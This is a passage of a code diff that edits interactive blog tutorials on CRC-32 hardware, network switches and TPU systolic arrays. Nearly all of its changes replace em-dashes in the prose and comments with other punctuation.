     let c = ((crc as number) ^ (data as number)) & 0xff;
@@ -75,7 +75,7 @@ export const CRC32Step = circuit('CRC32Step', {
 // the running CRC. Register starts at 0xFF (truncated from 0xFFFFFFFF init).
 export const CRC32ByteDemo = circuit('CRC32ByteDemo', {
   nodes: {
-    data: Input({ value: 49 }), // ASCII '1' — first byte of "123456789"
+    data: Input({ value: 49 }), // ASCII '1', first byte of "123456789"
     crcReg: Register({ value: 0xff }), // CRC-32 initialises to 0xFFFFFFFF; we track low byte
     step: CRC32Step,
     display: HexDisplay,

--- a/apps/web/src/features/blog/crc32-in-hardware/sections/CRC32Section.tsx
+++ b/apps/web/src/features/blog/crc32-in-hardware/sections/CRC32Section.tsx
@@ -196,7 +196,7 @@ export function CRC32Section() {
           sequentially, the hardware precomputes the effect of all 8 polynomial shifts in parallel
           and produces the result in a single clock cycle. At 100 Gbps, a NIC must compute CRC-32
           over roughly 12.5 billion bytes per second. The unrolled hardware does exactly that with a
-          fixed amount of combinational logic &mdash; no loops, no branches.
+          fixed amount of combinational logic, with no loops and no branches.
         </p>
       </div>
     </section>

--- a/apps/web/src/features/blog/crc32-in-hardware/sections/HeroSection.tsx
+++ b/apps/web/src/features/blog/crc32-in-hardware/sections/HeroSection.tsx
@@ -17,21 +17,21 @@ export function HeroSection() {
       </h1>
 
       <p className="text-lg text-gray-500 dark:text-gray-300 leading-relaxed mb-4">
-        The 4-byte checksum at the end of every Ethernet frame, ZIP file, and NVMe command &mdash;
-        computed by a 32-bit shift register with XOR feedback taps running at line rate in the NIC
-        on your machine right now.
+        The 4-byte checksum at the end of every Ethernet frame, ZIP file, and NVMe command, computed
+        by a 32-bit shift register with XOR feedback taps running at line rate in the NIC on your
+        machine right now.
       </p>
       <p className="text-gray-500 dark:text-gray-400 leading-relaxed mb-4">
         CRC-32 is not magic. It&rsquo;s a{' '}
-        <strong className="text-gray-900 dark:text-white">linear feedback shift register</strong>{' '}
-        &mdash; 32 flip-flops in a chain, with certain outputs XOR&rsquo;d back into the input. The
-        specific XOR positions are defined by the Ethernet polynomial 0x04C11DB7. Every 1-bit in
-        that 32-bit constant is a wire from a flip-flop output back into the chain.
+        <strong className="text-gray-900 dark:text-white">linear feedback shift register</strong>:{' '}
+        32 flip-flops in a chain, with certain outputs XOR&rsquo;d back into the input. The specific
+        XOR positions are defined by the Ethernet polynomial 0x04C11DB7. Every 1-bit in that 32-bit
+        constant is a wire from a flip-flop output back into the chain.
       </p>
       <p className="text-gray-500 dark:text-gray-400 leading-relaxed">
         In this post, you&rsquo;ll build a 4-bit LFSR, understand how the polynomial defines the
-        wiring, and watch the CRC-32 accumulator process bytes one at a time &mdash; the same
-        operation your NIC performs at 25 Gbps.
+        wiring, and watch the CRC-32 accumulator process bytes one at a time, the same operation
+        your NIC performs at 25 Gbps.
       </p>
     </section>
   );

--- a/apps/web/src/features/blog/crc32-in-hardware/sections/LFSRSection.tsx
+++ b/apps/web/src/features/blog/crc32-in-hardware/sections/LFSRSection.tsx
@@ -17,9 +17,9 @@ export function LFSRSection() {
           &ldquo;tap&rdquo; positions.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          With the right choice of tap positions &mdash; determined by an irreducible polynomial
-          over GF(2) &mdash; an n-bit LFSR cycles through every possible non-zero state exactly once
-          before repeating. A 4-bit LFSR with taps at positions 0 and 3 visits all 2<sup>4</sup>
+          With the right choice of tap positions, determined by an irreducible polynomial over
+          GF(2), an n-bit LFSR cycles through every possible non-zero state exactly once before
+          repeating. A 4-bit LFSR with taps at positions 0 and 3 visits all 2<sup>4</sup>
           &nbsp;&minus;&nbsp;1 &nbsp;=&nbsp;15 states. A 32-bit LFSR visits over 4 billion.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
@@ -47,7 +47,7 @@ export function LFSRSection() {
           data before being fed back. Instead of generating a pseudorandom sequence, you&rsquo;re
           computing a checksum: the final register state after clocking in all the data bytes is the
           CRC. The Ethernet polynomial 0xEDB88320 (the reflected form of 0x04C11DB7) specifies
-          exactly which of the 32 flip-flop outputs get XOR&rsquo;d back &mdash; those are the tap
+          exactly which of the 32 flip-flop outputs get XOR&rsquo;d back, and those are the tap
           positions.
         </p>
       </div>

--- a/apps/web/src/features/blog/crc32-in-hardware/sections/PolynomialSection.tsx
+++ b/apps/web/src/features/blog/crc32-in-hardware/sections/PolynomialSection.tsx
@@ -14,8 +14,8 @@ export function PolynomialSection() {
           <code className="text-sm bg-gray-100 dark:bg-gray-800 px-1.5 py-0.5 rounded font-mono">
             0xEDB88320
           </code>{' '}
-          in reflected (bit-reversed) form. Both represent the same mathematical object &mdash; a
-          degree-32 polynomial over GF(2):
+          in reflected (bit-reversed) form. Both represent the same mathematical object, a degree-32
+          polynomial over GF(2):
         </p>
 
         <div className="rounded-lg bg-gray-100 dark:bg-gray-900 border border-gray-200 dark:border-gray-700 p-4 font-mono text-sm overflow-x-auto">
@@ -87,9 +87,9 @@ export function PolynomialSection() {
 
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           In a real NIC running at 25 Gbps, the CRC-32 engine is unrolled to process multiple bits
-          per clock cycle &mdash; but the mathematics is identical. The hardware is fixed at
-          tape-out; there are no microcode decisions, no branch predictions, no cache misses. Just
-          wires and XOR gates, computing the polynomial remainder at the speed of light.
+          per clock cycle, but the mathematics is identical. The hardware is fixed at tape-out;
+          there are no microcode decisions, no branch predictions, no cache misses. Just wires and
+          XOR gates, computing the polynomial remainder at the speed of light.
         </p>
 
         <div className="rounded-lg border border-amber-800/40 bg-amber-950/20 p-4">

--- a/apps/web/src/features/blog/crc32-in-hardware/sections/VerifySection.tsx
+++ b/apps/web/src/features/blog/crc32-in-hardware/sections/VerifySection.tsx
@@ -108,23 +108,23 @@ export function VerifySection() {
           </h3>
           <ul className="space-y-1 text-sm text-gray-500 dark:text-gray-400">
             <li>
-              <strong className="text-gray-900 dark:text-gray-300">Ethernet frames</strong> &mdash;
-              the 4-byte FCS (Frame Check Sequence) field at the end of every packet
+              <strong className="text-gray-900 dark:text-gray-300">Ethernet frames</strong>: the
+              4-byte FCS (Frame Check Sequence) field at the end of every packet
             </li>
             <li>
-              <strong className="text-gray-900 dark:text-gray-300">ZIP archives</strong> &mdash;
-              stored in the local file header and central directory for each file
+              <strong className="text-gray-900 dark:text-gray-300">ZIP archives</strong>: stored in
+              the local file header and central directory for each file
             </li>
             <li>
-              <strong className="text-gray-900 dark:text-gray-300">PNG images</strong> &mdash; each
-              chunk ends with a CRC-32 of the chunk type and data
+              <strong className="text-gray-900 dark:text-gray-300">PNG images</strong>: each chunk
+              ends with a CRC-32 of the chunk type and data
             </li>
             <li>
-              <strong className="text-gray-900 dark:text-gray-300">NVMe / SATA</strong> &mdash;
-              every sector has a CRC computed in the drive controller before writing to flash
+              <strong className="text-gray-900 dark:text-gray-300">NVMe / SATA</strong>: every
+              sector has a CRC computed in the drive controller before writing to flash
             </li>
             <li>
-              <strong className="text-gray-900 dark:text-gray-300">gzip / zlib</strong> &mdash; the
+              <strong className="text-gray-900 dark:text-gray-300">gzip / zlib</strong>: the
               checksum appended to compressed streams
             </li>
           </ul>

--- a/apps/web/src/features/blog/how-network-switches-work/circuits.ts
+++ b/apps/web/src/features/blog/how-network-switches-work/circuits.ts
@@ -210,7 +210,7 @@ const CrossbarRouter = circuit('CrossbarRouter', {
 });
 
 // NOTE: the original circuit referenced `ram` in the connect callback but did not
-// declare it in `nodes` — that was a silent bug. Add `ram: DualPortRAM` here.
+// declare it in `nodes`, which was a silent bug. Add `ram: DualPortRAM` here.
 const PacketSerializer = circuit('PacketSerializer', {
   nodes: {
     ram: DualPortRAM(),

--- a/apps/web/src/features/blog/how-network-switches-work/sections/ArbiterSection.tsx
+++ b/apps/web/src/features/blog/how-network-switches-work/sections/ArbiterSection.tsx
@@ -16,7 +16,7 @@ export function ArbiterSection() {
           port is ready, it gets the grant immediately.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          This is a purely combinational circuit &mdash; no clock needed. The{' '}
+          This is a purely combinational circuit, with no clock needed. The{' '}
           <strong>lastPort</strong> input represents the last-granted port (0 or 1). Toggle{' '}
           <strong>port0_ready</strong> and <strong>port1_ready</strong> to see how the{' '}
           <strong>portDisplay</strong> and <strong>validLed</strong> respond.

--- a/apps/web/src/features/blog/how-network-switches-work/sections/BufferSection.tsx
+++ b/apps/web/src/features/blog/how-network-switches-work/sections/BufferSection.tsx
@@ -19,7 +19,7 @@ export function BufferSection() {
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Port A handles writes (the ingress side), while port B lets us read back any stored byte
-          by address &mdash; this is how the forwarder will later fetch packet data for routing.
+          by address, which is how the forwarder will later fetch packet data for routing.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Set <strong>dataIn</strong> to any value, toggle <strong>writeCmd</strong>, and tick. The

--- a/apps/web/src/features/blog/how-network-switches-work/sections/EgressSection.tsx
+++ b/apps/web/src/features/blog/how-network-switches-work/sections/EgressSection.tsx
@@ -20,12 +20,12 @@ export function EgressSection() {
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The RAM is pre-loaded with 8 bytes of test data: 0xAA, 0xBB, 0xCC, etc. Toggle the{' '}
           <strong>enable</strong> switch and tick repeatedly to watch the pointer advance through
-          the data. When the pointer reaches 7, the <strong>doneLed</strong> lights up &mdash; the
+          the data. When the pointer reaches 7, the <strong>doneLed</strong> lights up and the
           packet is fully serialized.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          In the full switch, this same mechanism operates on each output port independently &mdash;
-          both ports can serialize their egress buffers simultaneously.
+          In the full switch, this same mechanism operates on each output port independently: both
+          ports can serialize their egress buffers simultaneously.
         </p>
       </div>
 

--- a/apps/web/src/features/blog/how-network-switches-work/sections/FrameSection.tsx
+++ b/apps/web/src/features/blog/how-network-switches-work/sections/FrameSection.tsx
@@ -12,8 +12,8 @@ export function FrameSection() {
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Raw bytes arrive on a wire, but not every byte is a packet. An Ethernet frame starts with
-          a <strong className="text-gray-900 dark:text-white">preamble</strong> &mdash; a sequence
-          of 0x55 bytes &mdash; followed by a{' '}
+          a <strong className="text-gray-900 dark:text-white">preamble</strong>, a sequence of 0x55
+          bytes, followed by a{' '}
           <strong className="text-gray-900 dark:text-white">Start-of-Frame Delimiter</strong> (SFD,
           0xD5). The switch must detect this pattern to know when real data begins.
         </p>
@@ -25,8 +25,8 @@ export function FrameSection() {
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Set <strong>byteIn</strong> to 85 (0x55), toggle the <strong>valid</strong> switch, and
-          tick &mdash; the state moves to 1 (waiting). Now set <strong>byteIn</strong> to 213 (0xD5)
-          and tick again &mdash; the state jumps to 2 and the <strong>frameLed</strong> lights up:
+          tick, and the state moves to 1 (waiting). Now set <strong>byteIn</strong> to 213 (0xD5)
+          and tick again: the state jumps to 2 and the <strong>frameLed</strong> lights up:
           we&rsquo;re in a frame.
         </p>
       </div>

--- a/apps/web/src/features/blog/how-network-switches-work/sections/HeroSection.tsx
+++ b/apps/web/src/features/blog/how-network-switches-work/sections/HeroSection.tsx
@@ -7,8 +7,8 @@ export function HeroSection() {
         </h1>
         <p className="mt-6 text-xl text-gray-500 dark:text-gray-300 leading-relaxed">
           Every time you open a web page, packets race through network switches that parse Ethernet
-          frames, buffer data, arbitrate between ports, and route bytes to their destination &mdash;
-          all in hardware, billions of times per second. Here we build one from scratch.
+          frames, buffer data, arbitrate between ports, and route bytes to their destination, all in
+          hardware, billions of times per second. Here we build one from scratch.
         </p>
         <div className="mt-8 flex items-center gap-4 text-sm text-gray-500 dark:text-gray-400">
           <span>Interactive tutorial</span>

--- a/apps/web/src/features/blog/how-network-switches-work/sections/RouterSection.tsx
+++ b/apps/web/src/features/blog/how-network-switches-work/sections/RouterSection.tsx
@@ -12,8 +12,8 @@ export function RouterSection() {
           A real switch looks at the destination MAC address to decide where to forward each packet.
           Our simplified 2-port switch uses a{' '}
           <strong className="text-gray-900 dark:text-white">static cross-over</strong>: anything
-          from port 0 goes to port 1, and vice versa. This is the minimal useful routing &mdash; a
-          2-port crossbar.
+          from port 0 goes to port 1, and vice versa. This is the minimal useful routing: a 2-port
+          crossbar.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The routing logic is just a comparator and a mux. If the source port equals 0, the{' '}
@@ -22,7 +22,7 @@ export function RouterSection() {
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Change <strong>sourcePort</strong> between 0 and 1 to see the <strong>destDisplay</strong>{' '}
-          flip to the opposite port. This is instant &mdash; pure combinational logic.
+          flip to the opposite port. This is instant, because it is pure combinational logic.
         </p>
       </div>
 

--- a/apps/web/src/features/blog/how-network-switches-work/sections/SwitchSection.tsx
+++ b/apps/web/src/features/blog/how-network-switches-work/sections/SwitchSection.tsx
@@ -22,8 +22,8 @@ export function SwitchSection() {
       </h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Everything we&rsquo;ve built &mdash; frame detection, packet buffering, fair arbitration,
-          crossbar routing, and byte serialization &mdash; comes together in one circuit. The full{' '}
+          Everything we&rsquo;ve built (frame detection, packet buffering, fair arbitration,
+          crossbar routing, and byte serialization) comes together in one circuit. The full{' '}
           <strong className="text-gray-900 dark:text-white">MiniSwitch2Port</strong> has two
           complete data paths, each with its own parser, ingress controller, and egress controller,
           connected through a shared arbiter and forwarder.
@@ -52,15 +52,15 @@ export function SwitchSection() {
       <div className="mt-8 prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           This is a simplified but structurally accurate model of how real network switches work.
-          Production switches use wider buses, deeper buffers, and more sophisticated routing tables
-          &mdash; but the architecture is the same: parse, buffer, arbitrate, route, serialize.
+          Production switches use wider buses, deeper buffers, and more sophisticated routing
+          tables, but the architecture is the same: parse, buffer, arbitrate, route, serialize.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The key insight is that a switch is not a computer running networking software. It&rsquo;s
           a <em>circuit</em> that performs packet forwarding in hardware. Every stage runs
           concurrently: while one packet is being serialized out of port 0, another can be parsed
           and buffered on port 1. This pipeline parallelism is why hardware switches can forward
-          millions of packets per second &mdash; far faster than any software router.
+          millions of packets per second, far faster than any software router.
         </p>
       </div>
     </section>

--- a/apps/web/src/features/blog/how-tpus-work/SystolicDemo.tsx
+++ b/apps/web/src/features/blog/how-tpus-work/SystolicDemo.tsx
@@ -41,7 +41,7 @@ const SYSTOLIC_LAYOUT: Record<string, { x: number; y: number }> = {
   display_c20: { x: 780, y: 300 },
   display_c21: { x: 910, y: 300 },
   display_c22: { x: 1040, y: 300 },
-  // Done LED (bottom) — start switch is hidden, controlled by UI button
+  // Done LED (bottom); start switch is hidden, controlled by UI button
   done_led: { x: 780, y: 560 },
 };
 

--- a/apps/web/src/features/blog/how-tpus-work/circuits.ts
+++ b/apps/web/src/features/blog/how-tpus-work/circuits.ts
@@ -31,7 +31,7 @@ import {
 } from '@simten/core/std';
 import type { BlogCircuit } from '../types';
 
-/** The PE definition used by all circuits — registered partial-sum output */
+/** The PE definition used by all circuits, with a registered partial-sum output */
 const PE_Systolic = circuit('PE_Systolic', {
   inputs: {
     dataIn: bus(8),
@@ -864,7 +864,7 @@ const Systolic3x3 = circuit('Systolic3x3', {
 });
 
 export const TestSystolic3x3 = circuit('TestSystolic3x3', {
-  // Formal `done` output port — asserts when the systolic array finishes
+  // Formal `done` output port, asserts when the systolic array finishes
   // its compute pipeline. Replaces a hook-side substring scan over
   // portValues looking for a node named "done_led". The visual done_led
   // stays for on-canvas rendering.
@@ -968,7 +968,7 @@ export const TestSystolic3x3 = circuit('TestSystolic3x3', {
 
 export const TPU_CIRCUITS: Record<string, BlogCircuit> = {
   /**
-   * Section 1: Multiply-Add — the fundamental operation.
+   * Section 1: Multiply-Add, the fundamental operation.
    */
   multiplyAdd: {
     name: 'Multiply-Add Unit',
@@ -1052,7 +1052,7 @@ export const TPU_CIRCUITS: Record<string, BlogCircuit> = {
   twoPEColumn: {
     name: 'Two-PE Column',
     description:
-      'Two PEs stacked vertically. Partial sums flow down through registers — one PE per clock cycle, just like real hardware.',
+      'Two PEs stacked vertically. Partial sums flow down through registers, one PE per clock cycle, just like real hardware.',
     circuit: TwoPEColumn,
     layout: {
       // Inputs (left)

--- a/apps/web/src/features/blog/how-tpus-work/sections/DataFlowSection.tsx
+++ b/apps/web/src/features/blog/how-tpus-work/sections/DataFlowSection.tsx
@@ -11,8 +11,8 @@ export function DataFlowSection() {
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The word &ldquo;systolic&rdquo; comes from the Greek word for the heart&rsquo;s rhythmic
           contraction. In a systolic array, data pulses through a grid of processing elements like
-          blood through arteries &mdash; each element receives data, processes it, and passes it
-          along in lockstep with the clock.
+          blood through arteries: each element receives data, processes it, and passes it along in
+          lockstep with the clock.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Here we connect two PEs{' '}
@@ -30,7 +30,7 @@ export function DataFlowSection() {
           (toggle <code className="text-blue-300">weightValid</code> on, tick, then toggle off). Now
           tick repeatedly to watch data flow from left to right. PE0 shows{' '}
           <code className="text-blue-300">data &times; weight0</code>, while PE1 shows{' '}
-          <code className="text-blue-300">data &times; weight1</code> &mdash; one cycle behind.
+          <code className="text-blue-300">data &times; weight1</code>, one cycle behind.
         </p>
       </div>
 

--- a/apps/web/src/features/blog/how-tpus-work/sections/MACSection.tsx
+++ b/apps/web/src/features/blog/how-tpus-work/sections/MACSection.tsx
@@ -11,11 +11,11 @@ export function MACSection() {
           <strong className="text-gray-900 dark:text-white">multiply and add</strong>. Take an
           incoming partial sum, multiply a data value by a weight, and add the product to the
           partial sum. That&rsquo;s one step of a dot product. Do it across millions of weights and
-          activations, and you get a matrix multiply &mdash; the heartbeat of deep learning.
+          activations, and you get a matrix multiply, the heartbeat of deep learning.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          The circuit below is purely combinational &mdash; no clock, no registers, no state. Three
-          inputs feed the calculation: <code className="text-blue-300">data</code>,{' '}
+          The circuit below is purely combinational: no clock, no registers, no state. Three inputs
+          feed the calculation: <code className="text-blue-300">data</code>,{' '}
           <code className="text-blue-300">weight</code>, and{' '}
           <code className="text-blue-300">partialSumIn</code>. The multiplier computes{' '}
           <code className="text-blue-300">data &times; weight</code>, and the adder produces{' '}
@@ -25,7 +25,7 @@ export function MACSection() {
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Try changing the input values and watch the result update. This single multiply-add is the
           atom from which we&rsquo;ll build a full systolic array. Accumulation doesn&rsquo;t happen
-          inside a single unit &mdash; it happens by <em>chaining</em> units together, passing each
+          inside a single unit. It happens by <em>chaining</em> units together, passing each
           one&rsquo;s partial sum output into the next one&rsquo;s input.
         </p>
       </div>
@@ -36,7 +36,7 @@ export function MACSection() {
           layout={TPU_CIRCUITS.multiplyAdd.layout}
           showControls
           title="Multiply-Add Unit"
-          description="partialSumIn + (data × weight) = result. Purely combinational — no clock needed."
+          description="partialSumIn + (data × weight) = result. Purely combinational, with no clock needed."
         />
       </div>
     </section>

--- a/apps/web/src/features/blog/how-tpus-work/sections/PESection.tsx
+++ b/apps/web/src/features/blog/how-tpus-work/sections/PESection.tsx
@@ -25,8 +25,8 @@ export function PESection() {
           <li>
             A <strong className="text-gray-900 dark:text-white">registered adder</strong> that
             computes <code className="text-blue-300">partialSumIn + product</code> and latches the
-            result into a register &mdash; <code className="text-blue-300">partialSumOut</code>{' '}
-            appears one clock cycle later.
+            result into a register, so <code className="text-blue-300">partialSumOut</code> appears
+            one clock cycle later.
           </li>
           <li>
             A <strong className="text-gray-900 dark:text-white">data pipeline register</strong> that
@@ -36,17 +36,17 @@ export function PESection() {
         </ol>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Both <code className="text-blue-300">partialSumOut</code> and{' '}
-          <code className="text-blue-300">dataOut</code> are <em>registered</em> &mdash; each takes
-          one clock cycle. Data moves right one PE per cycle, and partial sums move down one PE per
+          <code className="text-blue-300">dataOut</code> are <em>registered</em>, and each takes one
+          clock cycle. Data moves right one PE per cycle, and partial sums move down one PE per
           cycle. This symmetry is what makes the systolic array&rsquo;s timing work: both directions
           have the same latency per hop.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Load a weight: toggle <code className="text-blue-300">weightValid</code> on and tick once.
           Then turn valid off and tick again. Watch{' '}
-          <code className="text-blue-300">partialSumOut</code> update after the tick &mdash;
-          it&rsquo;s registered, not instant. The <code className="text-blue-300">dataOut</code>{' '}
-          display shows the data value delayed by one cycle, ready to feed the next PE.
+          <code className="text-blue-300">partialSumOut</code> update after the tick: it&rsquo;s
+          registered, not instant. The <code className="text-blue-300">dataOut</code> display shows
+          the data value delayed by one cycle, ready to feed the next PE.
         </p>
       </div>
 

--- a/apps/web/src/features/blog/how-tpus-work/sections/SystolicSection.tsx
+++ b/apps/web/src/features/blog/how-tpus-work/sections/SystolicSection.tsx
@@ -24,12 +24,12 @@ export function SystolicSection() {
       </h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Everything we&rsquo;ve built &mdash; multiply-add units, weight registers, horizontal data
-          pipelines, vertical partial-sum accumulation, and cycle control &mdash; comes together
-          here. Nine processing elements are arranged in a 3&times;3 grid. Each PE stores one weight
-          from matrix&nbsp;B. Activations from matrix&nbsp;A flow left to right through pipeline
-          registers. Partial sums flow top to bottom through registered stages in each column
-          &mdash; one PE per clock cycle.
+          Everything we&rsquo;ve built (multiply-add units, weight registers, horizontal data
+          pipelines, vertical partial-sum accumulation, and cycle control) comes together here. Nine
+          processing elements are arranged in a 3&times;3 grid. Each PE stores one weight from
+          matrix&nbsp;B. Activations from matrix&nbsp;A flow left to right through pipeline
+          registers. Partial sums flow top to bottom through registered stages in each column, one
+          PE per clock cycle.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The circuit computes{' '}
@@ -108,53 +108,53 @@ export function SystolicSection() {
         </div>
         <ol className="text-gray-600 dark:text-gray-300 leading-relaxed list-decimal list-inside space-y-2">
           <li>
-            <strong className="text-gray-900 dark:text-white">N cycles to feed data</strong> &mdash;
-            each row of PEs receives N activation values, one per cycle.
+            <strong className="text-gray-900 dark:text-white">N cycles to feed data</strong>: each
+            row of PEs receives N activation values, one per cycle.
           </li>
           <li>
             <strong className="text-gray-900 dark:text-white">
               N&minus;1 cycles for staggered injection
-            </strong>{' '}
-            &mdash; because each PE&rsquo;s partial-sum output goes through a register,
-            there&rsquo;s a one-cycle propagation delay per PE vertically. Row&nbsp;r must start
-            r&nbsp;cycles late so its activations arrive at the same time as the partial sum
-            traveling down from the row above.
+            </strong>
+            : because each PE&rsquo;s partial-sum output goes through a register, there&rsquo;s a
+            one-cycle propagation delay per PE vertically. Row&nbsp;r must start r&nbsp;cycles late
+            so its activations arrive at the same time as the partial sum traveling down from the
+            row above.
           </li>
           <li>
             <strong className="text-gray-900 dark:text-white">
               N cycles for vertical propagation
-            </strong>{' '}
-            &mdash; the partial sum must travel through N registered stages (one per PE) before the
-            final result appears at the bottom.
+            </strong>
+            : the partial sum must travel through N registered stages (one per PE) before the final
+            result appears at the bottom.
           </li>
         </ol>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           That&rsquo;s N + (N&minus;1) + N = 3N&minus;1 data cycles, plus 1 for weight loading = 3N
           total. If the vertical partial-sum path were <em>combinational</em> instead of registered
-          &mdash; meaning the entire column settles in a single cycle with no propagation delay
-          &mdash; you wouldn&rsquo;t need staggered injection or vertical wait time, and the total
-          would drop to just <strong className="text-gray-900 dark:text-white">2N cycles</strong>.
-          But a combinational chain 256 PEs deep can&rsquo;t close timing at real TPU clock speeds.
+          (meaning the entire column settles in a single cycle with no propagation delay), you
+          wouldn&rsquo;t need staggered injection or vertical wait time, and the total would drop to
+          just <strong className="text-gray-900 dark:text-white">2N cycles</strong>. But a
+          combinational chain 256 PEs deep can&rsquo;t close timing at real TPU clock speeds.
           Registers break that critical path, trading latency for a design that actually
           synthesizes.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Click <strong>Start</strong> and watch. The first few cycles look quiet &mdash; no results
+          Click <strong>Start</strong> and watch. The first few cycles look quiet. No results
           appear. That&rsquo;s pipeline fill: data is flowing rightward through pipeline registers
           and partial sums are building downward through registered stages, but nothing has reached
           the bottom of a column yet. Then results start appearing in a{' '}
           <strong className="text-gray-900 dark:text-white">diagonal wavefront</strong>: C[0][0]
           first (shortest path), then the next anti-diagonal, and so on until C[2][2] (longest path
-          through the array). This is exactly what you&rsquo;d see on a real chip &mdash; pipeline
-          latency, then a steady stream of results.
+          through the array). This is exactly what you&rsquo;d see on a real chip: pipeline latency,
+          then a steady stream of results.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           This is the same fundamental architecture that powers Google&rsquo;s TPU. A real TPUv1 has
-          a 256&times;256 systolic array &mdash; 65,536 processing elements performing 92 trillion
-          8-bit operations per second. The principles are identical: weights are loaded once and
-          held stationary, activations flow right through pipeline registers, and partial sums
-          accumulate through registered stages down each column. Staggered data injection keeps
-          everything synchronized.
+          a 256&times;256 systolic array, 65,536 processing elements performing 92 trillion 8-bit
+          operations per second. The principles are identical: weights are loaded once and held
+          stationary, activations flow right through pipeline registers, and partial sums accumulate
+          through registered stages down each column. Staggered data injection keeps everything
+          synchronized.
         </p>
       </div>
 
@@ -170,15 +170,15 @@ export function SystolicSection() {
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           What you just watched is the same process that happens inside every TPU inference. Matrix
           A holds activations from the previous layer. Matrix B holds the model&rsquo;s trained
-          weights. The systolic array computes the matrix product in a pipelined wavefront &mdash;
-          weights are loaded once, then activations stream through at full speed. The result feeds
-          into the next layer. Repeat for every layer in the network.
+          weights. The systolic array computes the matrix product in a pipelined wavefront: weights
+          are loaded once, then activations stream through at full speed. The result feeds into the
+          next layer. Repeat for every layer in the network.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The systolic design is powerful because it maximizes data reuse. Each activation value is
           read once from memory and multiplied by every weight in its row as it flows rightward.
           Each weight is loaded once and used for every activation that passes through its PE over
-          time. This dramatically reduces memory bandwidth &mdash; the bottleneck that limits GPU
+          time. This dramatically reduces memory bandwidth, the bottleneck that limits GPU
           performance on large language models.
         </p>
       </div>

--- a/apps/web/src/features/blog/how-tpus-work/sections/WeightFlowSection.tsx
+++ b/apps/web/src/features/blog/how-tpus-work/sections/WeightFlowSection.tsx
@@ -13,19 +13,19 @@ export function WeightFlowSection() {
           <strong className="text-gray-900 dark:text-white">vertically</strong>. Here we stack two
           PEs in a column. The top PE receives{' '}
           <code className="text-blue-300">partialSumIn = 0</code> and computes{' '}
-          <code className="text-blue-300">0 + data &times; weight0</code>. That result is registered
-          &mdash; it appears at the top PE&rsquo;s{' '}
+          <code className="text-blue-300">0 + data &times; weight0</code>. That result is
+          registered, and it appears at the top PE&rsquo;s{' '}
           <code className="text-blue-300">partialSumOut</code> one cycle later. The bottom PE then
           adds its own <code className="text-blue-300">data &times; weight1</code> to produce the
           full dot product, again registered one cycle later.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           This vertical flow is{' '}
-          <strong className="text-gray-900 dark:text-white">registered</strong> &mdash; partial sums
-          move down one PE per clock cycle, just like data moves right one PE per cycle. This
-          symmetry is critical for timing in real hardware. A 256-deep combinational chain
-          couldn&rsquo;t close timing at TPU clock speeds. Instead, each PE latches its partial sum
-          into a register, giving the signal a full cycle to propagate to the next PE.
+          <strong className="text-gray-900 dark:text-white">registered</strong>: partial sums move
+          down one PE per clock cycle, just like data moves right one PE per cycle. This symmetry is
+          critical for timing in real hardware. A 256-deep combinational chain couldn&rsquo;t close
+          timing at TPU clock speeds. Instead, each PE latches its partial sum into a register,
+          giving the signal a full cycle to propagate to the next PE.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           To compensate for this vertical delay, the systolic array uses{' '}
@@ -44,7 +44,7 @@ export function WeightFlowSection() {
           showControls
           autoRunSpeed={400}
           title="Two-PE Column"
-          description="Partial sums flow down through registers — one PE per clock cycle, matching real TPU hardware."
+          description="Partial sums flow down through registers, one PE per clock cycle, matching real TPU hardware."
         />
       </div>
     </section>

--- a/apps/web/src/features/blog/how-tpus-work/sections/WeightSection.tsx
+++ b/apps/web/src/features/blog/how-tpus-work/sections/WeightSection.tsx
@@ -12,15 +12,15 @@ export function WeightSection() {
           captures a value only when a{' '}
           <strong className="text-gray-900 dark:text-white">valid bit</strong> is asserted. Once
           latched, the weight stays fixed for the entire computation. This is the{' '}
-          <strong className="text-gray-900 dark:text-white">weight-stationary</strong> approach
-          &mdash; the weight is programmed once, then thousands of activation values stream past it,
-          each getting multiplied by the same weight.
+          <strong className="text-gray-900 dark:text-white">weight-stationary</strong> approach: the
+          weight is programmed once, then thousands of activation values stream past it, each
+          getting multiplied by the same weight.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The circuit below shows the weight register and a multiplier. Toggle{' '}
           <code className="text-blue-300">weightValid</code> on and click <strong>Tick</strong> to
           latch the weight. The stored weight display captures the value. Now turn valid off and
-          tick again &mdash; the stored weight holds steady. Change{' '}
+          tick again, and the stored weight holds steady. Change{' '}
           <code className="text-blue-300">dataIn</code> and watch the product update instantly: the
